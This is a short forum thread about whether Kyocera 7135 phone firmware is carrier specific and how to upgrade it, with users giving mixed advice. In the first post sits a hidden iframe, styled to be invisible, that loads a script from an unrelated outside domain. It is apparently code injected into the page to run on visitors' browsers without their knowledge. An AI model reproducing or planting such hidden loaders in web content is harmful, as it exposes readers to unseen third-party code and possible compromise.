Newbie firmware question

I just got my 7135 about a month ago. I noticed most of you are using verizon.

Is the firmware carrier specific?

I am currently with uscellular.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Yes. The firmware is carrier specific. Having said that, I doubt that you will find any significant user functionality differences between carriers.

Do you know where I can download the updated firmware and an installer from?

Once again, sorry for the "stupid" question. There is alot of garbage to sort through in over a years worth of posts and I'm not great with a search engine.

I've got a b-in-law that used to work for uscc, maybe he has some inside web links for me. I'll keep anyone that's interested up 2 date.

Just read the one thread I mentioned.... it was started on 8-28-03 so it is very recent. Not only does it mention the clues to the holy grail (on page 5 and else where) it includes invaluble information on the process itself. Very important to read if you wish to choose this upgrade path!

I'll just stick with what I've got for now (34/19). I have too many projects going on right now. And the fact I'm with uscellular, I really don't want to kill my phone, I like it too much. Seems like most of the info in this forum is geared towards verizon anyway. I'm sure they've carried the phone longer. Uscc just picked it up a few months ago in this area.

Thanks for the help. It is much appreciated.

SOFTWARE UPDATE

Its not as hard as it sounds. It took about 30 minutes total.

As far as Verizon specific, the software is the same for all carriers on the 7135.

Also, Alltel was the first carrier to offer the 7135.

Enjoy
